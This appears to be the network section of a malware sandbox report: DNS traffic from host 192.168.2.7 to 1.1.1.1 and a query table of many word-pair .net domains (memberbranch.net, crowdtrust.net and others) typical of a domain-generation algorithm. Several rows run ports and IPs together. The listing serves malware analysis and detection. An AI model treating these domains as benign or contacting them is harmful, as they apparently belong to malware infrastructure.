Aug 5, 2024 16:23:26.448745012 CEST  64729  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:26.458301067 CEST  53     64729  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:26.460000992 CEST  51249  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:26.470509052 CEST  53     51249  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:26.473237991 CEST  50123  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:26.942564964 CEST  53     50123  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:27.647510052 CEST  49566  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:27.891237020 CEST  53     49566  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:27.892193079 CEST  62372  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:27.903814077 CEST  53     62372  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:27.904778004 CEST  52650  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:23:27.914954901 CEST  53     52650  1.1.1.1       192.168.2.7
Aug 5, 2024 16:23:45.178628922 CEST  53     50058  162.159.36.2  192.168.2.7
Aug 5, 2024 16:23:46.033658028 CEST  53     51844  1.1.1.1       192.168.2.7
Aug 5, 2024 16:24:19.329459906 CEST  57563  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:24:19.342288017 CEST  53     57563  1.1.1.1       192.168.2.7
Aug 5, 2024 16:24:20.344276905 CEST  59894  53     192.168.2.7   1.1.1.1
Aug 5, 2024 16:24:20.593597889 CEST  53     59894  1.1.1.1       192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:21.609978914 CEST5672353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:21.624454021 CEST53567231.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:22.641103029 CEST5185953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:22.656313896 CEST53518591.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:23.672787905 CEST6206353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:23.691430092 CEST53620631.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:24.703435898 CEST5197353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:24.714538097 CEST53519731.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:25.719153881 CEST5706553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:25.730051994 CEST53570651.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:26.734932899 CEST5549953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:26.745863914 CEST53554991.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:27.750502110 CEST5964953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:27.762432098 CEST53596491.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:28.766252041 CEST5602853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:29.008287907 CEST53560281.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:30.016100883 CEST5412053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:30.028261900 CEST53541201.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:31.033252954 CEST5281053192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:31.274490118 CEST53528101.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:32.281800985 CEST5245653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:32.644752026 CEST53524561.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:33.656968117 CEST5971553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:33.900650978 CEST53597151.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:34.907303095 CEST6206753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:34.919079065 CEST53620671.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:35.922257900 CEST6310153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:36.160528898 CEST53631011.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:37.172446966 CEST5442253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:37.414206982 CEST53544221.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:38.422349930 CEST6214153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:38.432774067 CEST53621411.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:39.438189983 CEST5717553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:39.679007053 CEST53571751.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:40.688630104 CEST5985253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:40.700752974 CEST53598521.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:41.703542948 CEST6187553192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:41.714907885 CEST53618751.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:42.719425917 CEST5193453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:42.730444908 CEST53519341.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:43.734996080 CEST5522953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:43.746114969 CEST53552291.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:44.753750086 CEST5947453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:44.764403105 CEST53594741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:45.766043901 CEST4927453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:45.778937101 CEST53492741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:46.781923056 CEST5533253192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:47.033505917 CEST53553321.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:49.797646046 CEST6197453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:49.808259010 CEST53619741.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:50.813277960 CEST5845153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:50.952276945 CEST53584511.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:51.969788074 CEST5783453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:51.980510950 CEST53578341.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:52.985311985 CEST5542853192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:52.995425940 CEST53554281.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:53.978466034 CEST5341453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:54.220349073 CEST53534141.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:55.157414913 CEST5688753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:55.169265985 CEST53568871.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.079106092 CEST5280653192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.089919090 CEST53528061.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.969827890 CEST6490753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:56.982188940 CEST53649071.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:57.828845024 CEST4991753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:58.484996080 CEST53499171.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.438075066 CEST5789953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.447949886 CEST53578991.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.448775053 CEST5473953192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.459800959 CEST53547391.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.460437059 CEST5938453192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.473557949 CEST53593841.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.474095106 CEST6011353192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.484698057 CEST53601131.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.485200882 CEST6170153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.497405052 CEST53617011.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.497925997 CEST6026153192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.509195089 CEST53602611.1.1.1192.168.2.7
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.509829044 CEST5469753192.168.2.71.1.1.1
                                                                                                                                                                                                          Aug 5, 2024 16:24:59.670346975 CEST53546971.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.475070000 CEST192.168.2.71.1.1.10xeb68Standard query (0)memberbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.488322973 CEST192.168.2.71.1.1.10x2bb8Standard query (0)followbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.734870911 CEST192.168.2.71.1.1.10x8529Standard query (0)memberbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:01.988740921 CEST192.168.2.71.1.1.10x6965Standard query (0)followreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:02.156263113 CEST192.168.2.71.1.1.10xa408Standard query (0)memberreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.282030106 CEST192.168.2.71.1.1.10x6b64Standard query (0)followquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.295202971 CEST192.168.2.71.1.1.10xe563Standard query (0)memberquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.315262079 CEST192.168.2.71.1.1.10x1065Standard query (0)beginbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.337171078 CEST192.168.2.71.1.1.10x4e44Standard query (0)knownbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:03.604362011 CEST192.168.2.71.1.1.10x94cStandard query (0)beginbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.608788967 CEST192.168.2.71.1.1.10x94cStandard query (0)beginbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.835983992 CEST192.168.2.71.1.1.10xa61bStandard query (0)knownbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:04.847100973 CEST192.168.2.71.1.1.10x60b4Standard query (0)beginreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.090862989 CEST192.168.2.71.1.1.10xc3b8Standard query (0)knownreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.341633081 CEST192.168.2.71.1.1.10x9190Standard query (0)beginquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.585297108 CEST192.168.2.71.1.1.10xa3ceStandard query (0)knownquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.597881079 CEST192.168.2.71.1.1.10x2466Standard query (0)summerbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.840672970 CEST192.168.2.71.1.1.10x95d6Standard query (0)crowdbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.853703976 CEST192.168.2.71.1.1.10xaa58Standard query (0)summerbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:05.866008997 CEST192.168.2.71.1.1.10x812Standard query (0)crowdbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.116499901 CEST192.168.2.71.1.1.10xe050Standard query (0)summerreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.128492117 CEST192.168.2.71.1.1.10xec85Standard query (0)crowdreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.490979910 CEST192.168.2.71.1.1.10xaf40Standard query (0)summerquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.735596895 CEST192.168.2.71.1.1.10xd1e9Standard query (0)crowdquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:06.747950077 CEST192.168.2.71.1.1.10xefe4Standard query (0)thoughtbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.849172115 CEST192.168.2.71.1.1.10xa031Standard query (0)waterbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.865964890 CEST192.168.2.71.1.1.10x3d40Standard query (0)thoughtbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:07.887386084 CEST192.168.2.71.1.1.10xf352Standard query (0)waterbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.141685009 CEST192.168.2.71.1.1.10x1e49Standard query (0)thoughtreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.154092073 CEST192.168.2.71.1.1.10x29ecStandard query (0)waterreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.168565035 CEST192.168.2.71.1.1.10xbcd1Standard query (0)thoughtquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.409615040 CEST192.168.2.71.1.1.10xd06cStandard query (0)waterquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.423027039 CEST192.168.2.71.1.1.10xe8ddStandard query (0)womanbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.434900999 CEST192.168.2.71.1.1.10x31e5Standard query (0)smokebranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:08.677520990 CEST192.168.2.71.1.1.10xfc2fStandard query (0)womanbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.184705973 CEST192.168.2.71.1.1.10x3e92Standard query (0)smokebelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.346751928 CEST192.168.2.71.1.1.10x8bb3Standard query (0)womanreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.358485937 CEST192.168.2.71.1.1.10x852aStandard query (0)smokereceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.369172096 CEST192.168.2.71.1.1.10x43f9Standard query (0)womanquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.382386923 CEST192.168.2.71.1.1.10x6394Standard query (0)smokequarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.394016981 CEST192.168.2.71.1.1.10x684dStandard query (0)partybranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.404695988 CEST192.168.2.71.1.1.10x5ee0Standard query (0)fightbranch.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:09.415920019 CEST192.168.2.71.1.1.10xd087Standard query (0)partybelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.120335102 CEST192.168.2.71.1.1.10xc6a6Standard query (0)fightbelieve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.132428885 CEST192.168.2.71.1.1.10xf832Standard query (0)partyreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:10.144993067 CEST192.168.2.71.1.1.10x480eStandard query (0)fightreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.140019894 CEST192.168.2.71.1.1.10x480eStandard query (0)fightreceive.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.338663101 CEST192.168.2.71.1.1.10x42b2Standard query (0)partyquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.585304022 CEST192.168.2.71.1.1.10x2855Standard query (0)fightquarter.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.596183062 CEST192.168.2.71.1.1.10x970Standard query (0)freshhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.608077049 CEST192.168.2.71.1.1.10xdcd4Standard query (0)experiencehonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.620794058 CEST192.168.2.71.1.1.10xa235Standard query (0)freshneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.870515108 CEST192.168.2.71.1.1.10x6e26Standard query (0)experienceneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:11.882783890 CEST192.168.2.71.1.1.10x862bStandard query (0)freshsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.124109030 CEST192.168.2.71.1.1.10x7de3Standard query (0)experiencesystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.137336016 CEST192.168.2.71.1.1.10x13c0Standard query (0)freshtrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.149853945 CEST192.168.2.71.1.1.10xf617Standard query (0)experiencetrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.388535023 CEST192.168.2.71.1.1.10x4524Standard query (0)gentlemanhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.404055119 CEST192.168.2.71.1.1.10xd3bbStandard query (0)alreadyhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.419003010 CEST192.168.2.71.1.1.10x1557Standard query (0)gentlemanneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.670917988 CEST192.168.2.71.1.1.10x92f4Standard query (0)alreadyneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.690764904 CEST192.168.2.71.1.1.10xcebfStandard query (0)gentlemansystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.704890013 CEST192.168.2.71.1.1.10xc33eStandard query (0)alreadysystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.716545105 CEST192.168.2.71.1.1.10x4832Standard query (0)gentlemantrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.956458092 CEST192.168.2.71.1.1.10x1bb4Standard query (0)alreadytrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.973203897 CEST192.168.2.71.1.1.10x86a9Standard query (0)followhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.986319065 CEST192.168.2.71.1.1.10x41c2Standard query (0)memberhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:12.999150991 CEST192.168.2.71.1.1.10x11c7Standard query (0)followneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.019520044 CEST192.168.2.71.1.1.10x64acStandard query (0)memberneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.265332937 CEST192.168.2.71.1.1.10xaa11Standard query (0)followsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.278017044 CEST192.168.2.71.1.1.10x8b99Standard query (0)membersystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:13.982986927 CEST192.168.2.71.1.1.10x8c56Standard query (0)followtrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.234230995 CEST192.168.2.71.1.1.10x145cStandard query (0)membertrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:14.778151989 CEST192.168.2.71.1.1.10x38b6Standard query (0)beginhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.024501085 CEST192.168.2.71.1.1.10x72f7Standard query (0)knownhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.036873102 CEST192.168.2.71.1.1.10xc9adStandard query (0)beginneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.287492990 CEST192.168.2.71.1.1.10xca5eStandard query (0)knownneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.530410051 CEST192.168.2.71.1.1.10x37cfStandard query (0)beginsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.543965101 CEST192.168.2.71.1.1.10xc5b0Standard query (0)knownsystem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.788389921 CEST192.168.2.71.1.1.10x382Standard query (0)begintrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.802088022 CEST192.168.2.71.1.1.10x5ad0Standard query (0)knowntrust.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.818175077 CEST192.168.2.71.1.1.10xc6fStandard query (0)summerhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:15.833758116 CEST192.168.2.71.1.1.10x4b9bStandard query (0)crowdhonor.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.076986074 CEST192.168.2.71.1.1.10x676fStandard query (0)summerneither.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Aug 5, 2024 16:23:16.089977026 CEST192.168.2.71.1.1.10xc2a4Standard query (0)crowdneither.netA (IP address)IN (0x0001)false
Aug 5, 2024 16:23:16.106254101 CEST | 192.168.2.7 | 1.1.1.1 | 0x3455 | Standard query (0) | summersystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:16.118916988 CEST | 192.168.2.7 | 1.1.1.1 | 0x9f3d | Standard query (0) | crowdsystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:16.135863066 CEST | 192.168.2.7 | 1.1.1.1 | 0x6058 | Standard query (0) | summertrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:16.148502111 CEST | 192.168.2.7 | 1.1.1.1 | 0xbb52 | Standard query (0) | crowdtrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:17.111905098 CEST | 192.168.2.7 | 1.1.1.1 | 0xfa40 | Standard query (0) | thoughthonor.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:17.132673979 CEST | 192.168.2.7 | 1.1.1.1 | 0x8b28 | Standard query (0) | waterhonor.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:17.155555010 CEST | 192.168.2.7 | 1.1.1.1 | 0x5995 | Standard query (0) | thoughtneither.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:17.176980972 CEST | 192.168.2.7 | 1.1.1.1 | 0x205f | Standard query (0) | waterneither.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:17.493551970 CEST | 192.168.2.7 | 1.1.1.1 | 0xcd7 | Standard query (0) | thoughtsystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:18.629637957 CEST | 192.168.2.7 | 1.1.1.1 | 0x9eff | Standard query (0) | watersystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:19.360114098 CEST | 192.168.2.7 | 1.1.1.1 | 0x2cb9 | Standard query (0) | thoughttrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:19.604113102 CEST | 192.168.2.7 | 1.1.1.1 | 0xb6c1 | Standard query (0) | watertrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:20.042613983 CEST | 192.168.2.7 | 1.1.1.1 | 0xdcbf | Standard query (0) | womanhonor.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:21.354139090 CEST | 192.168.2.7 | 1.1.1.1 | 0x5909 | Standard query (0) | smokehonor.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:21.599212885 CEST | 192.168.2.7 | 1.1.1.1 | 0x4ad2 | Standard query (0) | womanneither.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:21.615145922 CEST | 192.168.2.7 | 1.1.1.1 | 0x391 | Standard query (0) | smokeneither.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:21.626872063 CEST | 192.168.2.7 | 1.1.1.1 | 0x4709 | Standard query (0) | womansystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:21.801013947 CEST | 192.168.2.7 | 1.1.1.1 | 0xe1bb | Standard query (0) | smokesystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.051450968 CEST | 192.168.2.7 | 1.1.1.1 | 0xd725 | Standard query (0) | womantrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.063122034 CEST | 192.168.2.7 | 1.1.1.1 | 0x581b | Standard query (0) | smoketrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.308860064 CEST | 192.168.2.7 | 1.1.1.1 | 0xc380 | Standard query (0) | partyhonor.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.321954966 CEST | 192.168.2.7 | 1.1.1.1 | 0xaee2 | Standard query (0) | fighthonor.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.334274054 CEST | 192.168.2.7 | 1.1.1.1 | 0x94a9 | Standard query (0) | partyneither.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.349205017 CEST | 192.168.2.7 | 1.1.1.1 | 0xfd7b | Standard query (0) | fightneither.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.364785910 CEST | 192.168.2.7 | 1.1.1.1 | 0xf73b | Standard query (0) | partysystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.528754950 CEST | 192.168.2.7 | 1.1.1.1 | 0xc7a9 | Standard query (0) | fightsystem.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.564809084 CEST | 192.168.2.7 | 1.1.1.1 | 0x4c8b | Standard query (0) | partytrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.576502085 CEST | 192.168.2.7 | 1.1.1.1 | 0x68dc | Standard query (0) | fighttrust.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.587383986 CEST | 192.168.2.7 | 1.1.1.1 | 0x5cb1 | Standard query (0) | freshlaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.602730989 CEST | 192.168.2.7 | 1.1.1.1 | 0x2b38 | Standard query (0) | experiencelaughter.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:22.853321075 CEST | 192.168.2.7 | 1.1.1.1 | 0x6bce | Standard query (0) | freshfancy.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:23.543642044 CEST | 192.168.2.7 | 1.1.1.1 | 0xca35 | Standard query (0) | experiencefancy.net | A (IP address) | IN (0x0001) | false
Aug 5, 2024 16:23:23.786580086 CEST | 192.168.2.7 | 1.1.1.1 | 0x3aff | Standard query (0) | freshconsider.net | A (IP address) | IN (0x0001) | false
